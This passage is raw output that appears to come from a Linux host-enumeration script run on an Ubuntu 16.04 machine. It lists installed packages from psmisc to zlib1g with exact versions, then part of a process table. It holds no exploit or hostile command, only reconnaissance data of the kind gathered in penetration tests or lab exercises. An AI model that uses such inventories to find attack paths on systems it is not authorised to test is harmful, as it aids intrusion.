psmisc 22.21-2.1build1 utilities that use the proc file system
pulseaudio 1:8.0-0ubuntu3.4 PulseAudio sound server
pulseaudio-module-bluetooth 1:8.0-0ubuntu3.4 Bluetooth module for PulseAudio sound server
pulseaudio-module-x11 1:8.0-0ubuntu3.4 X11 module for PulseAudio sound server
pulseaudio-utils 1:8.0-0ubuntu3.4 Command line tools for the PulseAudio sound server
pyotherside 1.4.0-2 transitional dummy package
python 2.7.11-1 interactive high-level object-oriented language (default version)
python-apt-common 1.1.0~beta1build1 Python interface to libapt-pkg (locales)
python-minimal 2.7.11-1 minimal subset of the Python language (default version)
python-talloc 2.1.5-2 hierarchical pool based memory allocator - Python bindings
python2.7 2.7.12-1ubuntu0~16.04.1 Interactive high-level object-oriented language (version 2.7)
python2.7-minimal 2.7.12-1ubuntu0~16.04.1 Minimal subset of the Python language (version 2.7)
python3 3.5.1-3 interactive high-level object-oriented language (default python3 version)
python3-apport 2.20.1-0ubuntu2.10 Python 3 library for Apport crash report handling
python3-apt 1.1.0~beta1build1 Python 3 interface to libapt-pkg
python3-aptdaemon 1.1.1+bzr982-0ubuntu14 Python 3 module for the server and client of aptdaemon
python3-aptdaemon.gtk3widgets 1.1.1+bzr982-0ubuntu14 Python 3 GTK+ 3 widgets to run an aptdaemon client
python3-aptdaemon.pkcompat 1.1.1+bzr982-0ubuntu14 PackageKit compatibilty for AptDaemon
python3-blinker 1.3.dfsg2-1build1 fast, simple object-to-object and broadcast signaling library
python3-brlapi 5.3.1-2ubuntu2.1 Braille display access via BRLTTY - Python3 bindings
python3-bs4 4.4.1-1 error-tolerant HTML parser for Python 3
python3-cairo 1.10.0+dfsg-5build1 Python 3 bindings for the Cairo vector graphics library
python3-cffi-backend 1.5.2-1ubuntu1 Foreign Function Interface for Python 3 calling C code - runtime
python3-chardet 2.3.0-2 universal character encoding detector for Python3
python3-checkbox-support 0.22-1 collection of Python modules used by PlainBox providers
python3-commandnotfound 0.3ubuntu16.04.2 Python 3 bindings for command-not-found.
python3-cryptography 1.2.3-1ubuntu0.1 Python library exposing cryptographic recipes and primitives (Python 3)
python3-cups 1.9.73-0ubuntu2 Python3 bindings for CUPS
python3-cupshelpers 1.5.7+20160212-0ubuntu2 Python modules for printer configuration with CUPS
python3-dbus 1.2.0-3 simple interprocess messaging system (Python 3 interface)
python3-debian 0.1.27ubuntu2 Python 3 modules to work with Debian-related data formats
python3-defer 1.0.6-2build1 Small framework for asynchronous programming (Python 3)
python3-distupgrade 1:16.04.23 manage release upgrades
python3-feedparser 5.1.3-3build1 Universal Feed Parser for Python 3
python3-gdbm:amd64 3.5.1-1 GNU dbm database support for Python 3.x
python3-gi 3.20.0-0ubuntu1 Python 3 bindings for gobject-introspection libraries
python3-gi-cairo 3.20.0-0ubuntu1 Python 3 Cairo bindings for the GObject library
python3-guacamole 0.9.2-1 framework for creating command line applications (Python 3)
python3-html5lib 0.999-4 HTML parser/tokenizer based on the WHATWG HTML5 specification (Python 3)
python3-httplib2 0.9.1+dfsg-1 comprehensive HTTP client library written for Python3
python3-idna 2.0-3 Python IDNA2008 (RFC 5891) handling (Python 3)
python3-jinja2 2.8-1 small but fast and easy to use stand-alone template engine
python3-jwt 1.3.0-1ubuntu0.1 Python 3 implementation of JSON Web Token
python3-louis 2.6.4-2ubuntu0.1 Python bindings for liblouis
python3-lxml 3.5.0-1build1 pythonic binding for the libxml2 and libxslt libraries
python3-mako 1.0.3+ds1-1ubuntu1 fast and lightweight templating for the Python 3 platform
python3-markupsafe 0.23-2build2 HTML/XHTML/XML string library for Python 3
python3-minimal 3.5.1-3 minimal subset of the Python language (default python3 version)
python3-oauthlib 1.0.3-1 generic, spec-compliant implementation of OAuth for Python3
python3-padme 1.1.1-2 mostly transparent proxy class for Python 3
python3-pexpect 4.0.1-1 Python 3 module for automating interactive applications
python3-pil:amd64 3.1.2-0ubuntu1.1 Python Imaging Library (Python3)
python3-pkg-resources 20.7.0-1 Package Discovery and Resource Access using pkg_resources
python3-plainbox 0.25-1 toolkit for software and hardware testing (python3 module)
python3-problem-report 2.20.1-0ubuntu2.10 Python 3 library to handle problem reports
python3-ptyprocess 0.5-1 Run a subprocess in a pseudo terminal from Python 3
python3-pyasn1 0.1.9-1 ASN.1 library for Python (Python 3 module)
python3-pyatspi 2.18.0+dfsg-3 Assistive Technology Service Provider Interface - Python3 bindings
python3-pycurl 7.43.0-1ubuntu1 Python bindings to libcurl (Python 3)
python3-pyparsing 2.0.3+dfsg1-1ubuntu0.1 Python parsing module, Python3 package
python3-renderpm:amd64 3.3.0-1 python low level render interface
python3-reportlab 3.3.0-1 ReportLab library to create PDF documents using Python3
python3-reportlab-accel:amd64 3.3.0-1 C coded extension accelerator for the ReportLab Toolkit
python3-requests 2.9.1-3 elegant and simple HTTP library for Python3, built for human beings
python3-six 1.10.0-3 Python 2 and 3 compatibility library (Python 3 interface)
python3-software-properties 0.96.20.7 manage the repositories that you install software from
python3-speechd 0.8.3-1ubuntu3 Python interface to Speech Dispatcher
python3-systemd 231-2build1 Python 3 bindings for systemd
python3-uno 1:5.1.6~rc2-0ubuntu1~xenial2 Python-UNO bridge
python3-update-manager 1:16.04.10 python 3.x module for update-manager
python3-urllib3 1.13.1-2ubuntu0.16.04.1 HTTP library with thread-safe connection pooling for Python3
python3-xdg 0.25-4 Python 3 library to access freedesktop.org standards
python3-xkit 0.5.0ubuntu2 library for the manipulation of xorg.conf files (Python 3)
python3-xlsxwriter 0.7.3-1 Python 3 module for creating Excel XLSX files
python3.5 3.5.2-2ubuntu0~16.04.3 Interactive high-level object-oriented language (version 3.5)
python3.5-minimal 3.5.2-2ubuntu0~16.04.3 Minimal subset of the Python language (version 3.5)
qdbus 4:4.8.7+dfsg-5ubuntu2 Qt 4 D-Bus tool
qml-module-io-thp-pyotherside:amd64 1.4.0-2 asynchronous Python 3 Bindings for Qt 5 (QML plugin)
qml-module-qt-labs-folderlistmodel:amd64 5.5.1-2ubuntu6 Qt 5 folderlistmodel QML module
qml-module-qt-labs-settings:amd64 5.5.1-2ubuntu6 Qt 5 settings QML module
qml-module-qtfeedback:amd64 5.0~git20130529-0ubuntu13 Qt 5 Feedback QML module
qml-module-qtgraphicaleffects:amd64 5.5.1-1ubuntu1 Qt 5 Graphical Effects module
qml-module-qtquick-layouts:amd64 5.5.1-1ubuntu1 Qt 5 Quick Layouts QML module
qml-module-qtquick-window2:amd64 5.5.1-2ubuntu6 Qt 5 window 2 QML module
qml-module-qtquick2:amd64 5.5.1-2ubuntu6 Qt 5 Qt Quick 2 QML module
qml-module-qttest:amd64 5.5.1-2ubuntu6 Qt 5 test QML module
qml-module-ubuntu-components:amd64 1.3.1918+16.04.20160404-0ubuntu1 Qt Components for Ubuntu - Components QML plugin
qml-module-ubuntu-layouts:amd64 1.3.1918+16.04.20160404-0ubuntu1 Qt Components for Ubuntu - Layouts QML plugin
qml-module-ubuntu-onlineaccounts:amd64 0.6+16.04.20151106-0ubuntu1 Expose the Online Accounts API to QML applications
qml-module-ubuntu-performancemetrics:amd64 1.3.1918+16.04.20160404-0ubuntu1 Qt Components for Ubuntu - PerformanceMetrics QML plugin
qml-module-ubuntu-test:amd64 1.3.1918+16.04.20160404-0ubuntu1 Qt Components for Ubuntu - Test QML plugin
qml-module-ubuntu-web:amd64 0.23+16.04.20161028-0ubuntu2 Ubuntu web QML module
qmlscene 5.5.1-2ubuntu6 Qt 5 QML scene viewer
qpdf 6.0.0-2 tools for transforming and inspecting PDF files
qt-at-spi:amd64 0.4.0-3 at-spi accessibility plugin for Qt
qtchooser 52-gae5eeef-2build1~gcc5.2 Wrapper to select between Qt development binary versions
qtcore4-l10n 4:4.8.7+dfsg-5ubuntu2 Qt 4 core module translations
qtdeclarative5-accounts-plugin:amd64 0.6+16.04.20151106-0ubuntu1 transitional dummy package for Online Accounts QML clients
qtdeclarative5-dev-tools 5.5.1-2ubuntu6 Qt 5 declarative development programs
qtdeclarative5-qtquick2-plugin:amd64 5.5.1-2ubuntu6 transitional dummy package Qt 5 Qt Quick 2 QML module
qtdeclarative5-test-plugin:amd64 5.5.1-2ubuntu6 transitional dummy package for Qt 5 test QML module
qtdeclarative5-ubuntu-ui-toolkit-plugin 1.3.1918+16.04.20160404-0ubuntu1 Transitional dummy package for Ubuntu UI Toolkit QML plugin
qtdeclarative5-unity-action-plugin:amd64 1.1.0+14.04.20140304-0ubuntu2~gcc5.1 Unity Action QML Components
qttranslations5-l10n 5.5.1-2build1 translations for Qt 5
readline-common 6.3-8ubuntu2 GNU readline and history libraries, common files
remmina 1.1.2-3ubuntu1 remote desktop client for GNOME desktop environment
remmina-common 1.1.2-3ubuntu1 common files for remmina remote desktop client
remmina-plugin-rdp 1.1.2-3ubuntu1 RDP plugin for remmina remote desktop client
remmina-plugin-vnc 1.1.2-3ubuntu1 VNC plugin for remmina remote desktop client
rename 0.20-4 Perl extension for renaming multiple files
resolvconf 1.78ubuntu5 name server information handler
rfkill 0.5-1ubuntu3 tool for enabling and disabling wireless devices
rhythmbox 3.3-1ubuntu7 music player and organizer for GNOME
rhythmbox-data 3.3-1ubuntu7 data files for rhythmbox
rhythmbox-plugin-zeitgeist 3.3-1ubuntu7 zeitgeist plugin for rhythmbox music player
rhythmbox-plugins 3.3-1ubuntu7 plugins for rhythmbox music player
rsync 3.1.1-3ubuntu1 fast, versatile, remote (and local) file-copying tool
rsyslog 8.16.0-1ubuntu3 reliable system and kernel logging daemon
rtkit 0.11-4 Realtime Policy and Watchdog Daemon
samba-libs:amd64 2:4.3.11+dfsg-0ubuntu0.16.04.11 Samba core libraries
sane-utils 1.0.25+git20150528-1ubuntu2.16.04.1 API library for scanners -- utilities
sbsigntool 0.6-0ubuntu10.1 utility for signing and verifying files for UEFI Secure Boot
seahorse 3.18.0-2ubuntu1 GNOME front end for GnuPG
secureboot-db 1.1 Secure Boot updates for DB and DBX
sed 4.2.2-7 The GNU sed stream editor
sensible-utils 0.0.9 Utilities for sensible alternative selection
session-migration 0.2.3 Tool to migrate in user session settings
session-shortcuts 1.2ubuntu0.16.04.1 Allows you to shutdown, logout, and reboot from dash
sessioninstaller 0.20+bzr150-0ubuntu4.1 APT based installer using PackageKit's session DBus API
sgml-base 1.26+nmu4ubuntu1 SGML infrastructure and SGML catalog file support
shared-mime-info 1.5-2ubuntu0.1 FreeDesktop.org shared MIME database and spec
shotwell 0.22.0+git20160108.r1.f2fb1f7-0ubuntu1.1 digital photo organizer
shotwell-common 0.22.0+git20160108.r1.f2fb1f7-0ubuntu1.1 digital photo organizer - common files
signon-keyring-extension 0.6+14.10.20140513-0ubuntu2 GNOME keyring extension for signond
signon-plugin-oauth2 0.23+16.04.20151209-0ubuntu1 Single Signon oauth2 plugin
signon-plugin-password 8.58+16.04.20151106-0ubuntu1 Plain Password plugin for Single Sign On
signon-ui 0.17+16.04.20151125-0ubuntu1 Dummy transitional package for signon-ui
signon-ui-service 0.17+16.04.20151125-0ubuntu1 D-Bus service file for signon-ui
signon-ui-x11 0.17+16.04.20151125-0ubuntu1 Single Sign-on UI
signond 8.58+16.04.20151106-0ubuntu1 Single Sign On framework
simple-scan 3.20.0-0ubuntu1 Simple Scanning Utility
snapd 2.28.5 Daemon and tooling that enable snap packages
snapd-login-service 1.13-0ubuntu0.16.04.1 Daemon to allow non-root access to snapd
sni-qt:amd64 0.2.7+16.04.20170217.1-0ubuntu1 indicator support for Qt
software-properties-common 0.96.20.7 manage the repositories that you install software from (common)
software-properties-gtk 0.96.20.7 manage the repositories that you install software from (gtk)
sound-theme-freedesktop 0.8-1 freedesktop.org sound theme
speech-dispatcher 0.8.3-1ubuntu3 Common interface to speech synthesizers
speech-dispatcher-audio-plugins:amd64 0.8.3-1ubuntu3 Speech Dispatcher: Audio output plugins
squashfs-tools 1:4.3-3ubuntu2 Tool to create and append to squashfs filesystems
ssh-import-id 5.5-0ubuntu1 securely retrieve an SSH public key and install it locally
ssl-cert 1.0.37 simple debconf wrapper for OpenSSL
strace 4.11-1ubuntu3 System call tracer
sudo 1.8.16-0ubuntu1.5 Provide limited super user privileges to specific users
suru-icon-theme 14.04+16.04.20161024-0ubuntu1 Ubuntu Suru Icon theme
syslinux 3:6.03+dfsg-11ubuntu1 collection of bootloaders (DOS FAT and NTFS bootloader)
syslinux-common 3:6.03+dfsg-11ubuntu1 collection of bootloaders (common)
syslinux-legacy 2:3.63+dfsg-2ubuntu8 Bootloader for Linux/i386 using MS-DOS floppies
system-config-printer-common 1.5.7+20160212-0ubuntu2 Printer configuration GUI
system-config-printer-gnome 1.5.7+20160212-0ubuntu2 Printer configuration GUI
system-config-printer-udev 1.5.7+20160212-0ubuntu2 Printer auto-configuration facility based on udev
systemd 229-4ubuntu21 system and service manager
systemd-sysv 229-4ubuntu21 system and service manager - SysV links
sysv-rc 2.88dsf-59.3ubuntu2 System-V-like runlevel change mechanism
sysvinit-utils 2.88dsf-59.3ubuntu2 System-V-like utilities
t1utils 1.39-2 Collection of simple Type 1 font manipulation programs
tar 1.28-2.1ubuntu0.1 GNU version of the tar archiving utility
tcl 8.6.0+9 Tool Command Language (default version) - shell
tcl8.6 8.6.5+dfsg-2 Tcl (the Tool Command Language) v8.6 - shell
tcpd 7.6.q-25 Wietse Venema's TCP wrapper utilities
tcpdump 4.9.2-0ubuntu0.16.04.1 command-line network traffic analyzer
telnet 0.17-40 basic telnet client
thermald 1.5-2ubuntu4 Thermal monitoring and controlling daemon
thunderbird 1:52.4.0+build1-0ubuntu0.16.04.2 Email, RSS and newsgroup client with integrated spam filter
thunderbird-gnome-support 1:52.4.0+build1-0ubuntu0.16.04.2 Email, RSS and newsgroup client - GNOME support
thunderbird-locale-en 1:52.4.0+build1-0ubuntu0.16.04.2 English language pack for Thunderbird
thunderbird-locale-en-us 1:52.4.0+build1-0ubuntu0.16.04.2 Transitional English language pack for Thunderbird
time 1.7-25.1 GNU time program for measuring CPU resource usage
tk 8.6.0+9 Toolkit for Tcl and X11 (default version) - windowing shell
tk8.6 8.6.5-1 Tk toolkit for Tcl and X11 v8.6 - windowing shell
toshset 1.76-4 Access much of the Toshiba laptop hardware interface
totem 3.18.1-1ubuntu4 Simple media player for the GNOME desktop based on GStreamer
totem-common 3.18.1-1ubuntu4 Data files for the Totem media player
totem-plugins 3.18.1-1ubuntu4 Plugins for the Totem media player
transmission-common 2.84-3ubuntu3 lightweight BitTorrent client (common files)
transmission-gtk 2.84-3ubuntu3 lightweight BitTorrent client (GTK+ interface)
ttf-ancient-fonts-symbola 2.59-1 symbolic font providing emoji characters from Unicode 7.0 (transitional package)
ttf-ubuntu-font-family 1:0.83-0ubuntu2 Ubuntu Font Family, sans-serif typeface hinted for clarity
tzdata 2017c-0ubuntu0.16.04 time zone and daylight-saving time data
ubuntu-artwork 1:14.04+16.04.20161024-0ubuntu1 Ubuntu themes and artwork
ubuntu-core-launcher 2.28.5 Transitional package for snapd
ubuntu-desktop 1.361.1 The Ubuntu desktop system
ubuntu-docs 16.04.4 Ubuntu Desktop Guide
ubuntu-drivers-common 1:0.4.17.3 Detect and install additional Ubuntu driver packages
ubuntu-keyring 2012.05.19 GnuPG keys of the Ubuntu archive
ubuntu-minimal 1.361.1 Minimal core of Ubuntu
ubuntu-mobile-icons 14.04+16.04.20161024-0ubuntu1 Ubuntu Mobile Icon theme
ubuntu-mono 14.04+16.04.20161024-0ubuntu1 Ubuntu Mono Icon theme
ubuntu-release-upgrader-core 1:16.04.23 manage release upgrades
ubuntu-release-upgrader-gtk 1:16.04.23 manage release upgrades
ubuntu-session 3.18.1.2-1ubuntu1.16.04.2 Ubuntu session
ubuntu-settings 15.10.8 default settings for the Ubuntu desktop
ubuntu-software 3.20.5-0ubuntu0.16.04.6 Utility for browsing, installing, and removing software
ubuntu-sounds 0.13 Ubuntu's GNOME audio theme
ubuntu-standard 1.361.1 The Ubuntu standard system
ubuntu-system-service 0.3 Dbus service to set various system-wide configurations
ubuntu-touch-sounds 15.08 sounds for the Ubuntu Touch image
ubuntu-ui-toolkit-theme 1.3.1918+16.04.20160404-0ubuntu1 Qt Components for Ubuntu - Ubuntu Theme
ubuntu-wallpapers 16.04.1-0ubuntu1 Ubuntu Wallpapers
ubuntu-wallpapers-xenial 16.04.1-0ubuntu1 Ubuntu 16.04 Wallpapers
ucf 3.0036 Update Configuration File(s): preserve user changes to config files
udev 229-4ubuntu21 /dev/ and hotplug management daemon
udisks2 2.1.7-1ubuntu1 D-Bus service to access and manipulate storage devices
ufw 0.35-0ubuntu2 program for managing a Netfilter firewall
unattended-upgrades 0.90ubuntu0.8 automatic installation of security upgrades
unity 7.4.0+16.04.20160906-0ubuntu1 Interface designed for efficiency of space and interaction.
unity-accessibility-profiles 0.1.10-0ubuntu3 Accessibility Profile Manager - Unity profile data
unity-asset-pool 0.8.24+15.04.20141217-0ubuntu2 Unity Assets Pool
unity-control-center 15.04.0+16.04.20170214-0ubuntu1 utilities to configure the GNOME desktop
unity-control-center-faces 15.04.0+16.04.20170214-0ubuntu1 utilities to configure the GNOME desktop - faces images
unity-control-center-signon 0.1.8+16.04.20160201-0ubuntu1 Unity Control Center extension for single signon
unity-greeter 16.04.2-0ubuntu1 Unity Greeter
unity-gtk-module-common 0.0.0+15.04.20150118-0ubuntu2 Common files for GtkMenuShell D-Bus exporter
unity-gtk2-module:amd64 0.0.0+15.04.20150118-0ubuntu2 GtkMenuShell D-Bus exporter
unity-gtk3-module:amd64 0.0.0+15.04.20150118-0ubuntu2 GtkMenuShell D-Bus exporter
unity-lens-applications 7.1.0+16.04.20160701-0ubuntu1 Application lens for unity
unity-lens-files 7.1.0+16.04.20151217-0ubuntu1 File lens for unity
unity-lens-music 6.9.1+16.04-0ubuntu1 Music lens for unity
unity-lens-photos 1.0+14.04.20140318-0ubuntu1 Photos lens for Unity
unity-lens-video 0.3.15+16.04.20160212.1-0ubuntu1 Unity Video lens
unity-schemas 7.4.0+16.04.20160906-0ubuntu1 Interface designed for efficiency of space and interaction.
unity-scope-calculator 0.1+14.04.20140328-0ubuntu1 Calculator scope for Unity
unity-scope-chromiumbookmarks 0.1+13.10.20130723-0ubuntu1 Chromium bookmarks scope for Unity
unity-scope-colourlovers 0.1+13.10.20130723-0ubuntu1 COLOURlovers scope for Unity
unity-scope-devhelp 0.1+14.04.20140328-0ubuntu1 devhelp scope for Unity
unity-scope-firefoxbookmarks 0.1+13.10.20130809.1-0ubuntu1 Firefox bookmarks scope for Unity
unity-scope-gdrive 0.9+16.04.20151125-0ubuntu1 Google Drive scope for Unity
unity-scope-home 6.8.2+16.04.20160212.1-0ubuntu1 Home scope that aggregates results from multiple scopes
unity-scope-manpages 3.0+14.04.20140324-0ubuntu1 Manual pages scope for Unity
unity-scope-openclipart 0.1+13.10.20130723-0ubuntu1 OpenClipArt scope for Unity
unity-scope-texdoc 0.1+14.04.20140328-0ubuntu1 Texdoc scope for Unity
unity-scope-tomboy 0.1+13.10.20130723-0ubuntu1 Tomboy scope for Unity
unity-scope-video-remote 0.3.15+16.04.20160212.1-0ubuntu1 Remote videos engine
unity-scope-virtualbox 0.1+13.10.20130723-0ubuntu1 VirtualBox scope for Unity
unity-scope-yelp 0.1+13.10.20130723-0ubuntu1 Help scope for Unity
unity-scope-zotero 0.1+13.10.20130723-0ubuntu1 Zotero scope for Unity
unity-scopes-master-default 6.8.2+16.04.20160212.1-0ubuntu1 Home scope that aggregates results from multiple scopes
unity-scopes-runner 7.1.4+16.04.20160701-0ubuntu1 desktop runner for misceallenous scopes
unity-services 7.4.0+16.04.20160906-0ubuntu1 Services for the Unity interface
unity-settings-daemon 15.04.1+16.04.20160701-0ubuntu1 daemon handling the Unity session settings
unity-webapps-common 2.4.17+15.10.20150616-0ubuntu2 Unity WebApp integration scripts
unity-webapps-qml 0.1+16.04.20160114-0ubuntu1 Unity Webapps QML component
unity-webapps-service 2.5.0~+16.04.20160201-0ubuntu1 Service for Web Apps integration with the Unity desktop
uno-libs3 5.1.6~rc2-0ubuntu1~xenial2 LibreOffice UNO runtime environment -- public shared libraries
unzip 6.0-20ubuntu1 De-archiver for .zip files
update-inetd 4.43 inetd configuration file updater
update-manager 1:16.04.10 GNOME application that manages apt updates
update-manager-core 1:16.04.10 manage release upgrades
update-notifier 3.168.5 Daemon which notifies about package updates
update-notifier-common 3.168.5 Files shared between update-notifier and other packages
upower 0.99.4-2ubuntu0.3 abstraction for power management
upstart 1.13.2-0ubuntu21.1 event-based init daemon - essential binaries
ure 5.1.6~rc2-0ubuntu1~xenial2 LibreOffice UNO runtime environment
ureadahead 0.100.0-19 Read required files in advance
usb-creator-common 0.3.2 create a startup disk using a CD or disc image (common files)
usb-creator-gtk 0.3.2 create a startup disk using a CD or disc image (for GNOME)
usb-modeswitch 2.2.5+repack0-1ubuntu1 mode switching tool for controlling "flip flop" USB devices
usb-modeswitch-data 20151101-1 mode switching data for usb-modeswitch
usbmuxd 1.1.0-2 USB multiplexor daemon for iPhone and iPod Touch devices
usbutils 1:007-4 Linux USB utilities
util-linux 2.27.1-6ubuntu3.3 miscellaneous system utilities
uuid-runtime 2.27.1-6ubuntu3.3 runtime components for the Universally Unique ID library
vbetool 1.1-3 run real-mode video BIOS code to alter hardware state
vim-common 2:7.4.1689-3ubuntu1.2 Vi IMproved - Common files
vim-tiny 2:7.4.1689-3ubuntu1.2 Vi IMproved - enhanced vi editor - compact version
vino 3.8.1-0ubuntu9.2 VNC server for GNOME
wamerican 7.1-1 American English dictionary words for /usr/share/dict
wbritish 7.1-1 British English dictionary words for /usr/share/dict
webapp-container 0.23+16.04.20161028-0ubuntu2 Ubuntu web applications container
webbrowser-app 0.23+16.04.20161028-0ubuntu2 Ubuntu web browser
wget 1.17.1-1ubuntu1.3 retrieves files from the web
whiptail 0.52.18-1ubuntu2 Displays user-friendly dialog boxes from shell scripts
whoopsie 0.2.52.5 Ubuntu error tracker submission
whoopsie-preferences 0.18 System preferences for error reporting
wireless-regdb 2015.07.20-1ubuntu1 wireless regulatory database
wireless-tools 30~pre9-8ubuntu1 Tools for manipulating Linux Wireless Extensions
wpasupplicant 2.4-0ubuntu6.2 client support for WPA and WPA2 (IEEE 802.11i)
x11-apps 7.7+5+nmu1ubuntu1 X applications
x11-common 1:7.7+13ubuntu3 X Window System (X.Org) infrastructure
x11-session-utils 7.7+2 X session utilities
x11-utils 7.7+3 X11 utilities
x11-xkb-utils 7.7+2 X11 XKB utilities
x11-xserver-utils 7.7+7 X server utilities
xauth 1:1.0.9-1ubuntu2 X authentication utility
xbitmaps 1.1.1-2 Base X bitmaps
xbrlapi 5.3.1-2ubuntu2.1 Access software for a blind person using a braille display - xbrlapi
xcursor-themes 1.0.4-1 Base X cursor themes
xdg-user-dirs 0.15-2ubuntu6 tool to manage well known user directories
xdg-user-dirs-gtk 0.10-1ubuntu1 tool to manage well known user directories (Gtk extension)
xdg-utils 1.1.1-1ubuntu1.16.04.1 desktop integration utilities from freedesktop.org
xdiagnose 3.8.4.1 X.org diagnosis tool
xfonts-base 1:1.0.4+nmu1 standard fonts for X
xfonts-encodings 1:1.0.4-2 Encodings for X.Org fonts
xfonts-scalable 1:1.0.3-1.1 scalable fonts for X
xfonts-utils 1:7.7+3ubuntu0.16.04.2 X Window System font utility programs
xinit 1.3.4-3ubuntu0.1 X server initialisation tool
xinput 1.6.2-1 Runtime configuration and test of XInput devices
xkb-data 2.16-1ubuntu1 X Keyboard Extension (XKB) configuration data
xml-core 0.13+nmu2 XML infrastructure and XML catalog file support
xorg 1:7.7+13ubuntu3 X.Org X Window System
xorg-docs-core 1:1.7.1-1ubuntu1 Core documentation for the X.org X Window System
xserver-common 2:1.18.4-0ubuntu0.7 common files used by various X servers
xserver-xorg-core-hwe-16.04 2:1.19.3-1ubuntu1~16.04.4 Xorg X server - core server
xserver-xorg-hwe-16.04 1:7.7+16ubuntu3~16.04.1 X.Org X server
xserver-xorg-input-all-hwe-16.04 1:7.7+16ubuntu3~16.04.1 X.Org X server -- input driver metapackage
xserver-xorg-input-evdev-hwe-16.04 1:2.10.5-1ubuntu1~16.04.1 X.Org X server -- evdev input driver
xserver-xorg-input-synaptics-hwe-16.04 1.9.0-1ubuntu1~16.04.1 Synaptics TouchPad driver for X.Org server
xserver-xorg-input-wacom-hwe-16.04 1:0.34.0-0ubuntu2~16.04.1 X.Org X server -- Wacom input driver
xserver-xorg-legacy-hwe-16.04 2:1.19.3-1ubuntu1~16.04.4 setuid root Xorg server wrapper
xserver-xorg-video-all-hwe-16.04 1:7.7+16ubuntu3~16.04.1 X.Org X server -- output driver metapackage
xserver-xorg-video-amdgpu-hwe-16.04 1.3.0-0ubuntu1~16.04.1 X.Org X server -- AMDGPU display driver
xserver-xorg-video-ati-hwe-16.04 1:7.9.0-0ubuntu1~16.04.1 X.Org X server -- AMD/ATI display driver wrapper
xserver-xorg-video-fbdev-hwe-16.04 1:0.4.4-1build6~16.04.1 X.Org X server -- fbdev display driver
xserver-xorg-video-intel-hwe-16.04 2:2.99.917+git20170309-0ubuntu1~16.04.1 X.Org X server -- Intel i8xx, i9xx display driver
xserver-xorg-video-nouveau-hwe-16.04 1:1.0.14-0ubuntu1~16.04.1 X.Org X server -- Nouveau display driver
xserver-xorg-video-qxl-hwe-16.04 0.1.5-2build1~16.04.1 X.Org X server -- QXL display driver
xserver-xorg-video-radeon-hwe-16.04 1:7.9.0-0ubuntu1~16.04.1 X.Org X server -- AMD/ATI Radeon display driver
xserver-xorg-video-vesa-hwe-16.04 1:2.3.4-1build3~16.04.1 X.Org X server -- VESA display driver
xserver-xorg-video-vmware-hwe-16.04 1:13.2.1-1build1~16.04.1 X.Org X server -- VMware display driver
xterm 322-1ubuntu1 X terminal emulator
xul-ext-ubufox 3.4-0ubuntu0.16.04.1 Ubuntu modifications for Firefox
xz-utils 5.1.1alpha+20120614-2ubuntu2 XZ-format compression utilities
yelp 3.18.1-1ubuntu4 Help browser for GNOME
yelp-xsl 3.18.1-1 XSL stylesheets for the yelp help browser
zeitgeist-core 0.9.16-0ubuntu4 event logging framework - engine
zeitgeist-datahub 0.9.16-0ubuntu4 event logging framework - passive logging daemon
zenity 3.18.1.1-1ubuntu2 Display graphical dialog boxes from shell scripts
zenity-common 3.18.1.1-1ubuntu2 Display graphical dialog boxes from shell scripts (common files)
zip 3.0-11 Archiver for .zip files
zlib1g:amd64 1:1.2.8.dfsg-2ubuntu4.1 compression library - runtime [+] Current processes
USER PID START TIME COMMAND
root 1 Jul28 0:04 /sbin/init
root 2 Jul28 0:00 [kthreadd]
root 4 Jul28 0:00 [kworker/0:0H]
root 6 Jul28 0:00 [ksoftirqd/0]
root 7 Jul28 0:00 [rcu_sched]
root 8 Jul28 0:00 [rcu_bh]
root 9 Jul28 0:00 [migration/0]
root 10 Jul28 0:00 [lru-add-drain]
root 11 Jul28 0:00 [watchdog/0]
root 12 Jul28 0:00 [cpuhp/0]
root 13 Jul28 0:00 [cpuhp/1]
root 14 Jul28 0:00 [watchdog/1]
root 15 Jul28 0:00 [migration/1]
root 16 Jul28 0:00 [ksoftirqd/1]
root 18 Jul28 0:00 [kworker/1:0H]
root 19 Jul28 0:00 [kdevtmpfs]
root 20 Jul28 0:00 [netns]
root 21 Jul28 0:00 [khungtaskd]
root 22 Jul28 0:00 [oom_reaper]
root 23 Jul28 0:00 [writeback]
root 24 Jul28 0:00 [kcompactd0]
root 25 Jul28 0:00 [ksmd]
root 26 Jul28 0:00 [khugepaged]
root 27 Jul28 0:00 [crypto]
root 28 Jul28 0:00 [kintegrityd]
root 29 Jul28 0:00 [bioset]
root 30 Jul28 0:00 [kblockd]
root 32 Jul28 0:00 [ata_sff]
root 33 Jul28 0:00 [md]
root 34 Jul28 0:00 [devfreq_wq]
root 35 Jul28 0:00 [watchdogd]
root 38 Jul28 0:00 [kauditd]
root 39 Jul28 0:00 [kswapd0]
root 40 Jul28 0:00 [vmstat]
root 41 Jul28 0:00 [bioset]
root 42 Jul28 0:00 [ecryptfs-kthrea]
root 83 Jul28 0:00 [kthrotld]
root 84 Jul28 0:00 [acpi_thermal_pm]
root 85 Jul28 0:00 [bioset]
root 86 Jul28 0:00 [bioset]
root 87 Jul28 0:00 [bioset]
root 88 Jul28 0:00 [bioset]
root 89 Jul28 0:00 [bioset]
root 90 Jul28 0:00 [bioset]
root 91 Jul28 0:00 [bioset]
root 92 Jul28 0:00 [bioset]
root 93 Jul28 0:00 [scsi_eh_0]
root 94 Jul28 0:00 [scsi_tmf_0]
root 95 Jul28 0:00 [scsi_eh_1]
root 96 Jul28 0:00 [scsi_tmf_1]
root 102 Jul28 0:00 [ipv6_addrconf]
root 123 Jul28 0:00 [charger_manager]
root 124 Jul28 0:00 [bioset]
root 182 Jul28 0:00 [ttm_swap]
root 184 Jul28 0:00 [scsi_eh_2]
root 185 Jul28 0:00 [scsi_tmf_2]
root 186 Jul28 0:00 [scsi_eh_3]
root 187 Jul28 0:00 [scsi_tmf_3]
root 188 Jul28 0:00 [scsi_eh_4]
root 189 Jul28 0:00 [scsi_tmf_4]
root 190 Jul28 0:00 [scsi_eh_5]
root 191 Jul28 0:00 [scsi_tmf_5]
root 192 Jul28 0:00 [scsi_eh_6]
root 193 Jul28 0:00 [scsi_tmf_6]
root 194 Jul28 0:00 [scsi_eh_7]
root 195 Jul28 0:00 [scsi_tmf_7]
root 196 Jul28 0:00 [scsi_eh_8]
root 197 Jul28 0:00 [scsi_tmf_8]
root 198 Jul28 0:00 [scsi_eh_9]
root 199 Jul28 0:00 [scsi_tmf_9]
root 200 Jul28 0:00 [scsi_eh_10]
root 201 Jul28 0:00 [scsi_tmf_10]
root 202 Jul28 0:00 [scsi_eh_11]
root 203 Jul28 0:00 [scsi_tmf_11]
